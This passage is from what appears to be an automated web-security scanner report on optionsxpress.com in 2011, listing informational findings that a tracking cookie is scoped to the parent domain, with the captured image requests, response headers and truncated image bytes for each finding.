Set-Cookie: TLTHID=2D4996A44048187A4C198BA79D16B45B; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:38 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1><p>The document has moved <a href="http://www.optionsxp
...[SNIP]...

9.65. http://www.optionsxpress.com/images/promo_static/ox.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promo_static/ox.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promo_static/ox.gif HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; mbox=check#true#1315527980|session#1315527919598-875378#1315529780

Response

HTTP/1.1 200 OK
Content-Length: 3615
Content-Type: image/gif
Last-Modified: Tue, 06 Sep 2011 15:02:30 GMT
Accept-Ranges: bytes
ETag: "c88eaffa56ccc1:1c1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=31B1D3A64DF4DC0943400890177ABC2A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT

GIF89a..-..@....q.k.........ZWX....r.M.E#. .........e.^...Y.R.....................@..}.w............... |...............0..P.....`..1-....LIJ?;<...............p........hef........................vstA
...[SNIP]...

9.66. http://www.optionsxpress.com/images/promo_unique/divider.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promo_unique/divider.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promo_unique/divider.jpg HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=52B8D84540D59FC59A4222A431C2EF7C; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521

Response

HTTP/1.1 200 OK
Content-Length: 788
Content-Type: image/jpeg
Last-Modified: Thu, 02 Dec 2010 21:21:24 GMT
Accept-Ranges: bytes
ETag: "e994b0df6692cb1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=FB0DC0464C7379B04E0F409D15B5A47F; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:42 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

9.67. http://www.optionsxpress.com/images/promo_unique/live-help.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promo_unique/live-help.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promo_unique/live-help.jpg HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=52B8D84540D59FC59A4222A431C2EF7C; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521

Response

HTTP/1.1 200 OK
Content-Length: 1255
Content-Type: image/jpeg
Last-Modified: Thu, 02 Dec 2010 21:21:24 GMT
Accept-Ranges: bytes
ETag: "378d7df6692cb1:11f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=57DCCA6044DEB5B2BAB532A38C7B950B; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

9.68. http://www.optionsxpress.com/images/promo_unique/phone.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promo_unique/phone.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promo_unique/phone.jpg HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=52B8D84540D59FC59A4222A431C2EF7C; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521

Response

HTTP/1.1 200 OK
Content-Length: 878
Content-Type: image/jpeg
Last-Modified: Thu, 02 Dec 2010 21:21:24 GMT
Accept-Ranges: bytes
ETag: "378d7df6692cb1:1756"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C58C6E0B422823B29D0E0DB0C88C0490; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

9.69. http://www.optionsxpress.com/images/promo_unique/shadow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promo_unique/shadow.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promo_unique/shadow.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=52B8D84540D59FC59A4222A431C2EF7C; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521

Response

HTTP/1.1 200 OK
Content-Length: 1812
Content-Type: image/png
Last-Modified: Thu, 02 Dec 2010 21:21:24 GMT
Accept-Ranges: bytes
ETag: "378d7df6692cb1:1c1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6B849C5246B01879A225D7A7A55F4F14; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:42 GMT

.PNG
.
...IHDR...S.........A6rV....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....n.0...@.|...w..
.iv-....3..k..(..?..}~~.!I.$I.$I.$I.$..[
.$I.$I.$I.$I..~|||XW......6..^.....8...+{..<6^.xu.U.G.[..1.
...[SNIP]...

9.70. http://www.optionsxpress.com/images/promos/allInOne.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/allInOne.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/allInOne.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; mbox=check#true#1315527980|session#1315527919598-875378#1315529780

Response

HTTP/1.1 200 OK
Content-Length: 81935
Content-Type: image/png
Last-Modified: Mon, 14 Mar 2011 20:49:48 GMT
Accept-Ranges: bytes
ETag: "a7e8b85b89e2cb1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D3B637A04BE2D0951ABF23BB3474971D; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT

.PNG
.
...IHDR................9...    pHYs................ cHRM..z%..............u0...`..:....o._.F..?.IDATx...[l.G..3..>......8.-..8M.I..N.P....6.....T..D...V.*. ...2.B.Jy).*
."hE...A.4!.r....qrN.sl.
...[SNIP]...

9.71. http://www.optionsxpress.com/images/promos/barronsBg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/barronsBg.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/barronsBg.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; TLTHID=FB0DC0464C7379B04E0F409D15B5A47F

Response

HTTP/1.1 200 OK
Content-Length: 21887
Content-Type: image/png
Last-Modified: Mon, 14 Mar 2011 20:49:48 GMT
Accept-Ranges: bytes
ETag: "f776c25b89e2cb1:11f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=5A39822A4290C06155A8A3BDE9F228C2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:44 GMT

.PNG
.
...IHDR....................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

9.72. http://www.optionsxpress.com/images/promos/chartC4c.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/chartC4c.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/chartC4c.jpg HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; mbox=check#true#1315527980|session#1315527919598-875378#1315529780

Response

HTTP/1.1 200 OK
Content-Length: 42196
Content-Type: image/jpeg
Last-Modified: Mon, 14 Mar 2011 20:49:49 GMT
Accept-Ranges: bytes
ETag: "cb13eb5b89e2cb1:11f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C1BC06414DC1E382D0B7728327B6D440; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:40 GMT

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Macintosh.2010:12:08 08:45:21.......
...[SNIP]...

9.73. http://www.optionsxpress.com/images/promos/footer1Logo11.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/footer1Logo11.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/footer1Logo11.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; TLTHID=F0BBCF5640548A4582D4D091C08D7EEB

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=44A373974F212A3FA1D871B5ECDA6C2D; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:47 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.74. http://www.optionsxpress.com/images/promos/kiplingerBg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/kiplingerBg.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/kiplingerBg.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; TLTHID=FB0DC0464C7379B04E0F409D15B5A47F

Response

HTTP/1.1 200 OK
Content-Length: 5677
Content-Type: image/png
Last-Modified: Tue, 29 Mar 2011 19:11:06 GMT
Accept-Ranges: bytes
ETag: "7311cdd45eecb1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A384F4AE4CB576BE96F6A394642C1659; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:43 GMT

.PNG
.
...IHDR..............-@Y....tEXtSoftware.Adobe ImageReadyq.e<....PLTE...PPP...............[[[ttt......EEEzzzxxxHHHLLLiii.............................................555666888444..............
...[SNIP]...

9.75. http://www.optionsxpress.com/images/promos/mainBottom.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/mainBottom.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/mainBottom.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=52B8D84540D59FC59A4222A431C2EF7C; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521

Response

HTTP/1.1 200 OK
Content-Length: 814
Content-Type: image/png
Last-Modified: Mon, 14 Mar 2011 20:49:49 GMT
Accept-Ranges: bytes
ETag: "fbf72d5c89e2cb1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=1C23A7D04D74A4E06208FF87FAE51FA5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:42 GMT

.PNG
.
...IHDR.......    ....._......    pHYs................ cHRM..z%..............u0...`..:....o._.F....IDATx.b........F.:....3....H..e`.w...@D.(........b.......x4..6...a.......b....?\...\...M..b..Xbs4.
...[SNIP]...

9.76. http://www.optionsxpress.com/images/promos/toolsIcons.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/toolsIcons.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/toolsIcons.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; TLTHID=FB0DC0464C7379B04E0F409D15B5A47F

Response

HTTP/1.1 200 OK
Content-Length: 97261
Content-Type: image/png
Last-Modified: Mon, 14 Mar 2011 20:49:50 GMT
Accept-Ranges: bytes
ETag: "7b6a7a5c89e2cb1:1c1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F0BBCF5640548A4582D4D091C08D7EEB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:43 GMT

.PNG
.
...IHDR...z.........'..G...    pHYs................ cHRM..z%..............u0...`..:....o._.F..{sIDATx...{...}..._.........X:...C.+D.y..6...L..`#..
.B..Ip
.P....L....Ml+&...#C.<..N...d.C..,$.HB.
...[SNIP]...

9.77. http://www.optionsxpress.com/images/promos/whiteboard_sales_lp.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promos/whiteboard_sales_lp.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promos/whiteboard_sales_lp.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; mbox=check#true#1315527980|session#1315527919598-875378#1315529780

Response

HTTP/1.1 200 OK
Content-Length: 75357
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 21:31:39 GMT
Accept-Ranges: bytes
ETag: "e0fcb87cd99cc1:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=52B8D84540D59FC59A4222A431C2EF7C; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:41 GMT

.PNG
.
...IHDR.......R.....Z..^....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..%.IDATx.b...?.(....`.add.......F.KFcd......1..0..@.........e.....x.`.y........5=.*@.....PR.c.>f'{......r.A...(h.
...[SNIP]...

9.78. http://www.optionsxpress.com/images/ui/ui-bg_glass_65_ffffff_1x400.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/ui/ui-bg_glass_65_ffffff_1x400.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ui/ui-bg_glass_65_ffffff_1x400.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527926087%27%5D%5D; s_campaign=gsus23305007; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; TLTHID=3DAC4327436FC1E882AB69BF2C12F5CC

Response

HTTP/1.1 200 OK
Content-Length: 105
Content-Type: image/png
Last-Modified: Wed, 09 Feb 2011 14:18:00 GMT
Accept-Ranges: bytes
ETag: "09cc92764c8cb1:1c1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6B7B91FF4BEF93129C8300900562EEEA; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:12 GMT

.PNG
.
...IHDR.............oX
....0IDAT8...!.. .......+.    ......J.HR).[lk.=O_..(.<`....H.".....IEND.B`.

9.79. http://www.optionsxpress.com/images/ui/ui-bg_highlight-soft_50_0b457d_1x100.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/ui/ui-bg_highlight-soft_50_0b457d_1x100.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ui/ui-bg_highlight-soft_50_0b457d_1x100.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=52B8D84540D59FC59A4222A431C2EF7C; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521

Response

HTTP/1.1 200 OK
Content-Length: 127
Content-Type: image/png
Last-Modified: Wed, 09 Feb 2011 14:18:00 GMT
Accept-Ranges: bytes
ETag: "09cc92764c8cb1:1878"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8A4FC8934AA82ABB3628E1AE3BB7B02A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:42 GMT

.PNG
.
...IHDR.......d.....G,Z`...FIDAT.........    3:....r.|a...6...?hY.Z.~..L+..    ..A..zB@..L..p.........    .WG.-j......IEND.B`.

9.80. http://www.optionsxpress.com/images/ui/ui-bg_highlight-soft_50_125697_1x100.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/ui/ui-bg_highlight-soft_50_125697_1x100.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ui/ui-bg_highlight-soft_50_125697_1x100.png HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527926087%27%5D%5D; s_campaign=gsus23305007; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; TLTHID=3DAC4327436FC1E882AB69BF2C12F5CC

Response

HTTP/1.1 200 OK
Content-Length: 184
Content-Type: image/png
Last-Modified: Wed, 09 Feb 2011 14:18:00 GMT
Accept-Ranges: bytes
ETag: "09cc92764c8cb1:1878"
Server: Microsoft-IIS/6.0
